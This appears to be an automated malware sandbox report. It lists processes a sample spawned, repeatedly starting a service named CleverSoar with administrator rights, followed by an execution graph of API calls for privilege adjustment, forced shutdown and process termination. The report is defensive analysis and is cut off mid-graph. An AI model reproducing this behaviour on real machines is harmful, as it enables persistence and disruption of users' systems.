                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:94
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:95
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:96
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:97
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:98
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:99
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:100
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:101
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:102
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:103
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:104
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:105
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:106
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:107
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:108
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:109
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:110
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:15%
                                          Total number of Nodes:833
                                          Total number of Limit Nodes:10
                                          execution_graph 65997 6c634b53 66155 6c7b6a43 65997->66155 65999 6c634b5c _Yarn 66169 6c7aaec0 65999->66169 66001 6c65639e 66265 6c7c0130 18 API calls 2 library calls 66001->66265 66003 6c634cff 66004 6c635164 CreateFileA CloseHandle 66009 6c6351ec 66004->66009 66005 6c634bae std::ios_base::_Ios_base_dtor 66005->66001 66005->66003 66005->66004 66006 6c64245a _Yarn _strlen 66005->66006 66006->66001 66007 6c7aaec0 FindFirstFileA 66006->66007 66012 6c642a83 std::ios_base::_Ios_base_dtor 66007->66012 66173 6c7b5120 OpenSCManagerA 66009->66173 66011 6c63ffe3 66021 6c7b5240 4 API calls 66011->66021 66031 6c640abc 66011->66031 66012->66001 66177 6c7a0390 66012->66177 66013 6c63fc00 66258 6c7b5240 CreateToolhelp32Snapshot 66013->66258 66014 6c6563b2 66266 6c6315e0 18 API calls std::ios_base::_Ios_base_dtor 66014->66266 66017 6c7b6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66050 6c635478 std::ios_base::_Ios_base_dtor _Yarn _strlen 66017->66050 66019 6c6437d0 Sleep 66061 6c6437e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66019->66061 66020 6c7aaec0 FindFirstFileA 66020->66050 66036 6c64053a 66021->66036 66022 6c7b5240 4 API calls 66046 6c6412e2 66022->66046 66024 6c6564f8 66025 6c656ba0 104 API calls 66025->66050 66026 6c656e60 32 API calls 66026->66050 66029 6c7b5240 4 API calls 66029->66031 66030 6c64211c 66030->66006 66034 6c64241a 66030->66034 66031->66006 66031->66022 66032 6c7b5240 4 API calls 66052 6c641dd9 66032->66052 66037 6c7a0390 11 API calls 66034->66037 66035 6c7aaec0 FindFirstFileA 66035->66061 66036->66029 66036->66031 66039 6c64244d 66037->66039 66038 6c636722 66234 6c7b1880 25 API calls 4 library calls 66038->66234 66264 6c7b5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66039->66264 66041 6c642452 Sleep 66041->66006 66042 6c6416ac 66043 6c636162 66044 6c63740b 66235 6c7b4ff0 CreateProcessA 66044->66235 66046->66030 66046->66032 66046->66042 66047 6c7b5240 4 API calls 66047->66030 66050->66001 66050->66013 66050->66017 66050->66020 66050->66025 66050->66026 66050->66038 66050->66043 66215 6c657090 66050->66215 66228 6c67e010 66050->66228 66051 6c657090 77 API calls 66051->66061 66052->66030 66052->66047 66053 6c67e010 67 API calls 66053->66061 66054 6c63775a _strlen 66054->66001 66055 6c637b92 66054->66055 66056 6c637ba9 66054->66056 66059 6c637b43 _Yarn 66054->66059 66057 6c7b6a43 std::_Facet_Register 4 API calls 66055->66057 66058 6c7b6a43 std::_Facet_Register 4 API calls 66056->66058 66057->66059 66058->66059 66060 6c7aaec0 FindFirstFileA 66059->66060 66069 6c637be7 std::ios_base::_Ios_base_dtor 66060->66069 66061->66001 66061->66035 66061->66051 66061->66053 66186 6c656ba0 66061->66186 66205 6c656e60 66061->66205 66062 6c7b4ff0 4 API calls 66073 6c638a07 66062->66073 66063 6c639d68 66065 6c7b6a43 std::_Facet_Register 4 API calls 66063->66065 66064 6c639d7f 66066 6c7b6a43 std::_Facet_Register 4 API calls 66064->66066 66067 6c639d18 _Yarn 66065->66067 66066->66067 66068 6c7aaec0 FindFirstFileA 66067->66068 66078 6c639dbd std::ios_base::_Ios_base_dtor 66068->66078 66069->66001 66069->66062 66070 6c63962c _strlen 66069->66070 66071 6c638387 66069->66071 66070->66001 66070->66063 66070->66064 66070->66067 66072 6c7b4ff0 4 API calls 66083 6c639120 66072->66083 66073->66072 66074 6c7b4ff0 4 API calls 66091 6c63a215 _strlen 66074->66091 66075 6c7b4ff0 4 API calls 66077 6c639624 66075->66077 66076 6c7b6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66084 6c63e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66076->66084 66239 6c7b5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66077->66239 66078->66001 66078->66074 66078->66084 66080 6c7aaec0 FindFirstFileA 66080->66084 66081 6c63ed02 Sleep 66103 6c63e8c1 66081->66103 66082 6c63f7b1 66257 6c7b5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66082->66257 66083->66075 66084->66001 66084->66076 66084->66080 66084->66081 66084->66082 66086 6c63e8dd GetCurrentProcess TerminateProcess 66086->66084 66087 6c63a9a4 66089 6c7b6a43 std::_Facet_Register 4 API calls 66087->66089 66088 6c63a9bb 66090 6c7b6a43 std::_Facet_Register 4 API calls 66088->66090 66098 6c63a953 _Yarn _strlen 66089->66098 66090->66098 66091->66001 66091->66087 66091->66088 66091->66098 66092 6c7b4ff0 4 API calls 66092->66103 66093 6c63fbb8 66094 6c63fbe8 ExitWindowsEx Sleep 66093->66094 66094->66013 66095 6c63f7c0 66095->66093 66096 6c63aff0 66099 6c7b6a43 std::_Facet_Register 4 API calls 66096->66099 66097 6c63b009 66100 6c7b6a43 std::_Facet_Register 4 API calls 66097->66100 66098->66014 66098->66096 66098->66097 66101 6c63afa0 _Yarn 66098->66101 66099->66101 66100->66101 66240 6c7b5960 66101->66240 66103->66084 66103->66086 66103->66092 66104 6c63b443 66108 6c7b6a43 std::_Facet_Register 4 API calls 66104->66108 66105 6c63b42c 66107 6c7b6a43 std::_Facet_Register 4 API calls 66105->66107 66106 6c63b059 std::ios_base::_Ios_base_dtor _strlen 66106->66001 66106->66104 66106->66105 66109 6c63b3da _Yarn _strlen 66106->66109 66107->66109 66108->66109 66109->66014 66110 6c63b7b7 66109->66110 66111 6c63b79e 66109->66111 66114 6c63b751 _Yarn 66109->66114 66113 6c7b6a43 std::_Facet_Register 4 API calls 66110->66113 66112 6c7b6a43 std::_Facet_Register 4 API calls 66111->66112 66112->66114 66113->66114 66115 6c7b5960 104 API calls 66114->66115 66116 6c63b804 std::ios_base::_Ios_base_dtor _strlen 66115->66116 66116->66001 66117 6c63bc26 66116->66117 66118 6c63bc0f 66116->66118 66121 6c63bbbd _Yarn _strlen 66116->66121 66120 6c7b6a43 std::_Facet_Register 4 API calls 66117->66120 66119 6c7b6a43 std::_Facet_Register 4 API calls 66118->66119 66119->66121 66120->66121 66121->66014 66122 6c63c075 66121->66122 66123 6c63c08e 66121->66123 66126 6c63c028 _Yarn 66121->66126 66124 6c7b6a43 std::_Facet_Register 4 API calls 66122->66124 66125 6c7b6a43 std::_Facet_Register 4 API calls 66123->66125 66124->66126 66125->66126 66127 6c7b5960 104 API calls 66126->66127 66132 6c63c0db std::ios_base::_Ios_base_dtor _strlen 66127->66132 66128 6c63c7a5 66130 6c7b6a43 std::_Facet_Register 4 API calls 66128->66130 66129 6c63c7bc 66131 6c7b6a43 std::_Facet_Register 4 API calls 66129->66131 66139 6c63c753 _Yarn _strlen 66130->66139 66131->66139 66132->66001 66132->66128 66132->66129 66132->66139 66133 6c63d406 66136 6c7b6a43 std::_Facet_Register 4 API calls 66133->66136 66134 6c63d3ed 66135 6c7b6a43 std::_Facet_Register 4 API calls 66134->66135 66137 6c63d39a _Yarn 66135->66137 66136->66137 66138 6c7b5960 104 API calls 66137->66138 66140 6c63d458 std::ios_base::_Ios_base_dtor _strlen 66138->66140 66139->66014 66139->66133 66139->66134 66139->66137 66145 6c63cb2f 66139->66145 66140->66001 66141 6c63d8a4 66140->66141 66142 6c63d8bb 66140->66142 66146 6c63d852 _Yarn _strlen 66140->66146 66143 6c7b6a43 std::_Facet_Register 4 API calls 66141->66143 66144 6c7b6a43 std::_Facet_Register 4 API calls 66142->66144 66143->66146 66144->66146 66146->66014 66147 6c63dcb6 66146->66147 66148 6c63dccf 66146->66148 66151 6c63dc69 _Yarn 66146->66151 66149 6c7b6a43 std::_Facet_Register 4 API calls 66147->66149 66150 6c7b6a43 std::_Facet_Register 4 API calls 66148->66150 66149->66151 66150->66151 66152 6c7b5960 104 API calls 66151->66152 66154 6c63dd1c std::ios_base::_Ios_base_dtor 66152->66154 66153 6c7b4ff0 4 API calls 66153->66084 66154->66001 66154->66153 66156 6c7b6a48 66155->66156 66157 6c7b6a62 66156->66157 66160 6c7b6a64 std::_Facet_Register 66156->66160 66267 6c7bf014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66156->66267 66157->65999 66159 6c7b78c3 std::_Facet_Register 66271 6c7b9379 RaiseException 66159->66271 66160->66159 66268 6c7b9379 RaiseException 66160->66268 66162 6c7b80bc IsProcessorFeaturePresent 66167 6c7b80e1 66162->66167 66164 6c7b7883 66269 6c7b9379 RaiseException 66164->66269 66166 6c7b78a3 std::invalid_argument::invalid_argument 66270 6c7b9379 RaiseException 66166->66270 66167->65999 66170 6c7aaed6 FindFirstFileA 66169->66170 66171 6c7aaed4 66169->66171 66172 6c7aaf10 66170->66172 66171->66170 66172->66005 66174 6c7b5156 66173->66174 66175 6c7b51e8 OpenServiceA 66174->66175 66176 6c7b522f 66174->66176 66175->66174 66176->66050 66182 6c7a03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66177->66182 66178 6c7a3f5f CloseHandle 66178->66182 66179 6c7a310e CloseHandle 66179->66182 66180 6c7a251b CloseHandle 66180->66182 66181 6c6437cb 66185 6c7b5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66181->66185 66182->66178 66182->66179 66182->66180 66182->66181 66183 6c78c1e0 WriteFile WriteFile WriteFile ReadFile 66182->66183 66272 6c78b730 66182->66272 66183->66182 66185->66019 66187 6c656bd5 66186->66187 66283 6c682020 66187->66283 66189 6c656c68 66190 6c7b6a43 std::_Facet_Register 4 API calls 66189->66190 66191 6c656ca0 66190->66191 66300 6c7b7327 66191->66300 66193 6c656cb4 66312 6c681d90 66193->66312 66196 6c656d8e 66196->66061 66198 6c656dc8 66320 6c6826e0 24 API calls 4 library calls 66198->66320 66200 6c656dda 66321 6c7b9379 RaiseException 66200->66321 66202 6c656def 66203 6c67e010 67 API calls 66202->66203 66204 6c656e0f 66203->66204 66204->66061 66206 6c656e9f 66205->66206 66209 6c656eb3 66206->66209 66717 6c683560 32 API calls std::_Xinvalid_argument 66206->66717 66211 6c656f5b 66209->66211 66719 6c682250 30 API calls 66209->66719 66720 6c6826e0 24 API calls 4 library calls 66209->66720 66721 6c7b9379 RaiseException 66209->66721 66212 6c656f6e 66211->66212 66718 6c6837e0 32 API calls std::_Xinvalid_argument 66211->66718 66212->66061 66216 6c65709e 66215->66216 66222 6c6570d1 66215->66222 66722 6c6801f0 66216->66722 66218 6c657183 66218->66050 66220 6c7c0b18 67 API calls 66220->66222 66222->66218 66726 6c682250 30 API calls 66222->66726 66223 6c6571ae 66727 6c682340 24 API calls 66223->66727 66225 6c6571be 66728 6c7b9379 RaiseException 66225->66728 66227 6c6571c9 66229 6c67e04b 66228->66229 66230 6c6801f0 64 API calls 66229->66230 66231 6c67e0a3 66229->66231 66232 6c67e098 66230->66232 66231->66050 66233 6c7c0b18 67 API calls 66232->66233 66233->66231 66234->66044 66236 6c7b50ca 66235->66236 66237 6c7b5080 WaitForSingleObject CloseHandle CloseHandle 66236->66237 66238 6c7b50e3 66236->66238 66237->66236 66238->66054 66239->66070 66241 6c7b59b7 66240->66241 66774 6c7b5ff0 66241->66774 66243 6c7b59c8 66244 6c656ba0 104 API calls 66243->66244 66245 6c7b59ec 66244->66245 66250 6c7b5a54 66245->66250 66256 6c7b5a67 66245->66256 66793 6c7b6340 66245->66793 66801 6c692000 66245->66801 66246 6c67e010 67 API calls 66248 6c7b5a9f std::ios_base::_Ios_base_dtor 66246->66248 66249 6c67e010 67 API calls 66248->66249 66251 6c7b5ae2 std::ios_base::_Ios_base_dtor 66249->66251 66811 6c7b5b90 66250->66811 66251->66106 66254 6c7b5a5c 66255 6c657090 77 API calls 66254->66255 66255->66256 66256->66246 66257->66095 66261 6c7b52a0 std::locale::_Setgloballocale 66258->66261 66259 6c7b5277 CloseHandle 66259->66261 66260 6c7b5320 Process32NextW 66260->66261 66261->66259 66261->66260 66262 6c7b53b1 66261->66262 66263 6c7b5345 Process32FirstW 66261->66263 66262->66011 66263->66261 66264->66041 66266->66024 66267->66156 66268->66164 66269->66166 66270->66159 66271->66162 66273 6c78b743 _Yarn __wsopen_s std::locale::_Setgloballocale 66272->66273 66274 6c78c180 66273->66274 66275 6c78bced CreateFileA 66273->66275 66277 6c78aa30 66273->66277 66274->66182 66275->66273 66278 6c78aa43 __wsopen_s std::locale::_Setgloballocale 66277->66278 66279 6c78b3e9 WriteFile 66278->66279 66280 6c78b43d WriteFile 66278->66280 66281 6c78b718 66278->66281 66282 6c78ab95 ReadFile 66278->66282 66279->66278 66280->66278 66281->66273 66282->66278 66284 6c7b6a43 std::_Facet_Register 4 API calls 66283->66284 66285 6c68207e 66284->66285 66286 6c7b7327 43 API calls 66285->66286 66287 6c682092 66286->66287 66322 6c682f60 42 API calls 4 library calls 66287->66322 66289 6c6820c8 66290 6c68210d 66289->66290 66291 6c682136 66289->66291 66292 6c682120 66290->66292 66323 6c7b6f8e 9 API calls 2 library calls 66290->66323 66324 6c682250 30 API calls 66291->66324 66292->66189 66295 6c68215b 66325 6c682340 24 API calls 66295->66325 66297 6c682171 66326 6c7b9379 RaiseException 66297->66326 66299 6c68217c 66299->66189 66301 6c7b7333 __EH_prolog3 66300->66301 66327 6c7b6eb5 66301->66327 66304 6c7b736f 66333 6c7b6ee6 66304->66333 66307 6c7b7351 66341 6c7b73ba 39 API calls std::locale::_Setgloballocale 66307->66341 66309 6c7b73ac 66309->66193 66310 6c7b7359 66342 6c7b71b1 HeapFree GetLastError _Yarn ___std_exception_destroy 66310->66342 66313 6c681ddc 66312->66313 66314 6c656d5d 66312->66314 66347 6c7b7447 66313->66347 66314->66196 66319 6c682250 30 API calls 66314->66319 66318 6c681e82 66319->66198 66320->66200 66321->66202 66322->66289 66323->66292 66324->66295 66325->66297 66326->66299 66328 6c7b6ec4 66327->66328 66331 6c7b6ecb 66327->66331 66343 6c7c03cd 6 API calls std::_Lockit::_Lockit 66328->66343 66330 6c7b6ec9 66330->66304 66340 6c7b7230 6 API calls 2 library calls 66330->66340 66331->66330 66344 6c7b858b EnterCriticalSection 66331->66344 66334 6c7c03db 66333->66334 66335 6c7b6ef0 66333->66335 66346 6c7c03b6 LeaveCriticalSection 66334->66346 66336 6c7b6f03 66335->66336 66345 6c7b8599 LeaveCriticalSection 66335->66345 66336->66309 66339 6c7c03e2 66339->66309 66340->66307 66341->66310 66342->66304 66343->66330 66344->66330 66345->66336 66346->66339 66348 6c7b7450 66347->66348 66349 6c681dea 66348->66349 66356 6c7bfd4a 66348->66356 66349->66314 66355 6c7bc563 18 API calls __cftoe 66349->66355 66351 6c7b749c 66351->66349 66367 6c7bfa58 65 API calls 66351->66367 66353 6c7b74b7 66353->66349 66368 6c7c0b18 66353->66368 66355->66318 66358 6c7bfd55 __wsopen_s 66356->66358 66357 6c7bfd68 66393 6c7c0120 18 API calls __cftoe 66357->66393 66358->66357 66359 6c7bfd88 66358->66359 66362 6c7bfd78 66359->66362 66379 6c7cae0c 66359->66379 66362->66351 66367->66353 66369 6c7c0b24 __wsopen_s 66368->66369 66370 6c7c0b2e 66369->66370 66371 6c7c0b43 66369->66371 66589 6c7c0120 18 API calls __cftoe 66370->66589 66378 6c7c0b3e 66371->66378 66574 6c7bc5a9 EnterCriticalSection 66371->66574 66373 6c7c0b60 66575 6c7c0b9c 66373->66575 66376 6c7c0b6b 66590 6c7c0b92 LeaveCriticalSection 66376->66590 66378->66349 66380 6c7cae18 __wsopen_s 66379->66380 66395 6c7c039f EnterCriticalSection 66380->66395 66382 6c7cae26 66396 6c7caeb0 66382->66396 66387 6c7caf72 66388 6c7cb091 66387->66388 66420 6c7cb114 66388->66420 66391 6c7bfdcc 66394 6c7bfdf5 LeaveCriticalSection 66391->66394 66393->66362 66394->66362 66395->66382 66399 6c7caed3 66396->66399 66397 6c7caf2b 66415 6c7c71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66397->66415 66399->66397 66405 6c7cae33 66399->66405 66413 6c7bc5a9 EnterCriticalSection 66399->66413 66414 6c7bc5bd LeaveCriticalSection 66399->66414 66400 6c7caf34 66416 6c7c47bb HeapFree GetLastError _free 66400->66416 66403 6c7caf3d 66403->66405 66417 6c7c6c1f 6 API calls std::_Lockit::_Lockit 66403->66417 66410 6c7cae6c 66405->66410 66407 6c7caf5c 66418 6c7bc5a9 EnterCriticalSection 66407->66418 66409 6c7caf6f 66409->66405 66419 6c7c03b6 LeaveCriticalSection 66410->66419 66412 6c7bfda3 66412->66362 66412->66387 66413->66399 66414->66399 66415->66400 66416->66403 66417->66407 66418->66409 66419->66412 66421 6c7cb133 66420->66421 66422 6c7cb146 66421->66422 66426 6c7cb15b 66421->66426 66436 6c7c0120 18 API calls __cftoe 66422->66436 66424 6c7cb0a7 66424->66391 66433 6c7d3fde 66424->66433 66426->66426 66431 6c7cb27b 66426->66431 66437 6c7d3ea8 37 API calls __cftoe 66426->66437 66428 6c7cb2cb 66428->66431 66438 6c7d3ea8 37 API calls __cftoe 66428->66438 66430 6c7cb2e9 66430->66431 66439 6c7d3ea8 37 API calls __cftoe 66430->66439 66431->66424 66440 6c7c0120 18 API calls __cftoe 66431->66440 66441 6c7d4396 66433->66441 66436->66424 66437->66428 66438->66430 66439->66431 66440->66424 66443 6c7d43a2 __wsopen_s 66441->66443 66442 6c7d43a9 66459 6c7c0120 18 API calls __cftoe 66442->66459 66443->66442 66444 6c7d43d4 66443->66444 66450 6c7d3ffe 66444->66450 66449 6c7d3ff9 66449->66391 66461 6c7c06cb 66450->66461 66456 6c7d4034 66457 6c7d4066 66456->66457 66501 6c7c47bb HeapFree GetLastError _free 66456->66501 66460 6c7d442b LeaveCriticalSection __wsopen_s 66457->66460 66459->66449 66460->66449 66502 6c7bbceb 66461->66502 66464 6c7c06ef 66466 6c7bbdf6 66464->66466 66511 6c7bbe4e 66466->66511 66468 6c7bbe0e 66468->66456 66469 6c7d406c 66468->66469 66526 6c7d44ec 66469->66526 66474 6c7d409e __dosmaperr 66474->66456 66476 6c7d4192 GetFileType 66477 6c7d419d GetLastError 66476->66477 66478 6c7d41e4 66476->66478 66555 6c7bf9f2 __dosmaperr _free 66477->66555 66556 6c7d17b0 SetStdHandle __dosmaperr __wsopen_s 66478->66556 66479 6c7d4167 GetLastError 66479->66474 66481 6c7d4115 66481->66476 66481->66479 66554 6c7d4457 CreateFileW 66481->66554 66482 6c7d41ab CloseHandle 66482->66474 66498 6c7d41d4 66482->66498 66485 6c7d415a 66485->66476 66485->66479 66486 6c7d4205 66487 6c7d4251 66486->66487 66557 6c7d4666 70 API calls 2 library calls 66486->66557 66491 6c7d4258 66487->66491 66571 6c7d4710 70 API calls 2 library calls 66487->66571 66490 6c7d4286 66490->66491 66493 6c7d4294 66490->66493 66558 6c7cb925 66491->66558 66493->66474 66494 6c7d4310 CloseHandle 66493->66494 66572 6c7d4457 CreateFileW 66494->66572 66496 6c7d433b 66497 6c7d4345 GetLastError 66496->66497 66496->66498 66499 6c7d4351 __dosmaperr 66497->66499 66498->66474 66573 6c7d171f SetStdHandle __dosmaperr __wsopen_s 66499->66573 66501->66457 66503 6c7bbd0b 66502->66503 66504 6c7bbd02 66502->66504 66503->66504 66505 6c7c49b2 __Getctype 37 API calls 66503->66505 66504->66464 66510 6c7c69d5 5 API calls std::_Lockit::_Lockit 66504->66510 66506 6c7bbd2b 66505->66506 66507 6c7c4f28 __Getctype 37 API calls 66506->66507 66508 6c7bbd41 66507->66508 66509 6c7c4f55 __cftoe 37 API calls 66508->66509 66509->66504 66510->66464 66512 6c7bbe5c 66511->66512 66513 6c7bbe76 66511->66513 66514 6c7bbddc __wsopen_s HeapFree GetLastError 66512->66514 66515 6c7bbe7d 66513->66515 66516 6c7bbe9c 66513->66516 66521 6c7bbe66 __dosmaperr 66514->66521 66518 6c7bbd9d __wsopen_s HeapFree GetLastError 66515->66518 66515->66521 66517 6c7c4843 __fassign MultiByteToWideChar 66516->66517 66519 6c7bbeab 66517->66519 66518->66521 66520 6c7bbeb2 GetLastError 66519->66520 66522 6c7bbed8 66519->66522 66523 6c7bbd9d __wsopen_s HeapFree GetLastError 66519->66523 66520->66521 66521->66468 66522->66521 66524 6c7c4843 __fassign MultiByteToWideChar 66522->66524 66523->66522 66525 6c7bbeef 66524->66525 66525->66520 66525->66521 66527 6c7d4527 66526->66527 66529 6c7d450d 66526->66529 66528 6c7d447c __wsopen_s 18 API calls 66527->66528 66533 6c7d455f 66528->66533 66529->66527 66530 6c7c0120 __cftoe 18 API calls 66529->66530 66530->66527 66531 6c7d458e 66532 6c7d5911 __wsopen_s 18 API calls 66531->66532 66538 6c7d4089 66531->66538 66534 6c7d45dc 66532->66534 66533->66531 66536 6c7c0120 __cftoe 18 API calls 66533->66536 66535 6c7d4659 66534->66535 66534->66538 66537 6c7c014d __Getctype 11 API calls 66535->66537 66536->66531 66539 6c7d4665 66537->66539 66538->66474 66540 6c7d160c 66538->66540 66541 6c7d1618 __wsopen_s 66540->66541 66542 6c7c039f std::_Lockit::_Lockit EnterCriticalSection 66541->66542 66544 6c7d161f 66542->66544 66543 6c7d1666 66546 6c7d1716 __wsopen_s LeaveCriticalSection 66543->66546 66544->66543 66545 6c7d1644 66544->66545 66550 6c7d16b3 EnterCriticalSection 66544->66550 66547 6c7d1842 __wsopen_s 11 API calls 66545->66547 66548 6c7d1686 66546->66548 66549 6c7d1649 66547->66549 66548->66474 66553 6c7d4457 CreateFileW 66548->66553 66549->66543 66552 